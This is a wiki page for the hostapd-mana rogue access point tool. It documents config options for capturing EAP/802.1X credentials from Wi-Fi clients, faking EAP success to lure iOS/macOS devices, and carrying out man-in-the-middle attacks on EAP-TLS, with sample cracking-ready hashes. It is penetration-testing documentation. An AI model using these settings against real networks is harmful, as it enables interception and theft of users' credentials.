Skip to content

MANA EAP Options (aka WPE)

Jump to bottom Edit New page
bitbane edited this page Aug 22, 2018 · 2 revisions

MANA EAP Options (aka WPE)

This assumes a basic understanding of hostapd.conf files. If you don’t have that, please read simplest hostapd.conf.

Certain forms of 802.1X (aka EAP) are vulnerable to interception of the credentials from the user. These were first popularised in freeradius-wpe (wireless pwnage edition) and continue in the modern hostapd-wpe mod. hostapd-mana supports many of the same attacks, and in some cases takes them further. This page will detail the relevant configuration options.

WPE Mode

You can enable WPE mode, which will intercept various EAP credentials, with the following config options: 

mana_wpe=1

Currently, WPE has been implemented for the following EAP modes:

  • EAP-PEAP/MSCHAPv2 (both PEAPv0 and PEAPv1) *

  • EAP-PEAP/GTC (both PEAPv0 and PEAPv1) *

  • EAP-PEAP/MD5 (both PEAPv0 and PEAPv1)

  • EAP-TTLS/EAP-MD5

  • EAP-TTLS/EAP-GTC *

  • EAP-TTLS/EAP-MSCHAPv2 *

  • EAP-TTLS/MSCHAPv2 *

  • EAP-TTLS/MSCHAP *

  • EAP-TTLS/PAP *

  • EAP-TTLS/CHAP *

  • EAP-MD5 *

  • EAP-MSCHAPv2

  • EAP-GTC *

* Have been tested and confirmed to work. The others should work based on code reuse.

By default, this will write the credentials to stdout only in one of asleap, john the ripper, hashcat or plaintext formats. For example: 

MANA EAP Identity Phase 0: anonymous
MANA EAP Identity Phase 1: test
MANA EAP EAP-MSCHAPV2 ASLEAP user=test | asleap -C d3:d9:2d:4a:5c:61:6a:e9 -R c6:5d:90:4a:78:7c:ca:76:7b:64:51:db:10:40:10:39:dc:e5:61:21:4b:27:43:3d
MANA EAP EAP-MSCHAPV2 JTR | test:$NETNTLM$d3d92d4a5c616ae9$c65d904a787cca767b6451db10401039dce561214b27433d:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | test::::c65d904a787cca767b6451db10401039dce561214b27433d:d3d92d4a5c616ae9

Logging credentials

Warning
 If you don’t provide this option, you’ll have to pull credentials from your scroll back buffer, which isn’t fun.

If you would like to have the captured credentials written to a file, then use the following config options: 

mana_credout=hostapd.credout
As with other file based options, ideally you should use a full path.

Credentials will be written with their EAP mode on the left, then a TAB (for easy cut’ting) and the appropriate cracking format. Here are a couple of examples (all hashes are test:password).

[EAP-MSCHAPV2 ASLEAP user=test] asleap -C 5d:79:b2:a8:59:66:d3:47 -R 55:6f:dd:a5:f6:7d:2b:74:6c:a3:31:5f:d8:b9:3a:dc:ab:5c:79:27:90:a9:2e:87
[EAP-MSCHAPV2 JTR]      test:$NETNTLM$5d79b2a85966d347$556fdda5f67d2b746ca3315fd8b93adcab5c792790a92e87:::::::
[EAP-MSCHAPV2 HASHCAT]  test::::556fdda5f67d2b746ca3315fd8b93adcab5c792790a92e87:5d79b2a85966d347
[TTLS-MSCHAPV2 ASLEAP user=test]        asleap -C 12:19:ea:7c:d2:a8:cd:42 -R 75:4c:13:f1:14:79:76:f5:e9:8b:de:f6:26:97:8d:fc:bd:3d:a3:af:9f:32:b0:0c
[TTLS-MSCHAPV2 JTR]     test:$NETNTLM$1219ea7cd2a8cd42$754c13f1147976f5e98bdef626978dfcbd3da3af9f32b00c:::::::
[TTLS-MSCHAPV2 HASHCAT] test::::754c13f1147976f5e98bdef626978dfcbd3da3af9f32b00c:1219ea7cd2a8cd42
[TTLS-MSCHAP ASLEAP user=test]  asleap -C 0c:82:5c:6c:11:c2:7c:f6 -R 25:42:3b:39:5b:c0:de:70:7e:af:88:3e:bc:c7:f1:2f:51:5d:1c:99:d0:7b:b8:f8
[TTLS-MSCHAP JTR]       test:$NETNTLM$0c825c6c11c27cf6$25423b395bc0de707eaf883ebcc7f12f515d1c99d07bb8f8:::::::
[TTLS-MSCHAP HASHCAT]   test::::25423b395bc0de707eaf883ebcc7f12f515d1c99d07bb8f8:0c825c6c11c27cf6
[TTLS-CHAP JTR user=test]     $chap$b7*c2e0f237f5c14a011f94cea57817ba2e*d2006e63307240ce9934b79b8ed2ffc3
[TTLS-CHAP HASHCAT user=test] d2006e63307240ce9934b79b8ed2ffc3:c2e0f237f5c14a011f94cea57817ba2e:b7
[TTLS-PAP]      test:password
[MD5 JTR user=test]     $chap$b7*c2e0f237f5c14a011f94cea57817ba2e*d2006e63307240ce9934b79b8ed2ffc3
[MD5 HASHCAT user=test] d2006e63307240ce9934b79b8ed2ffc3:c2e0f237f5c14a011f94cea57817ba2e:b7
[GTC]   test:password

If you want the hashes cleanly, because it’s tab separated, you could do something like: 

grep HASHCAT <file>|cut -f2

EAP Success

Certain clients or EAP modes are not robust against rogue access points, and it’s possible to just return an EAP success message to the client, and have it connect. Some modes, like MSCHAPv2 are supposed to prevent this, as the RADIUS server needs to prove knowledge of the password to the client. Notably iOS & macOS won’t perform this validation.

To enable sending EAP success messages, us the following config option: 

mana_eapsuccess=1

EAP TLS MitM

If EAP-TLS is in use, it is possible to have mana just accept whatever certificate the client presents, which means, as long as the client accepts the server certificate, you can still MitM the device.

You can enable this mode with the config option: 

mana_eaptls=1
Add a custom footer
Clone this wiki locally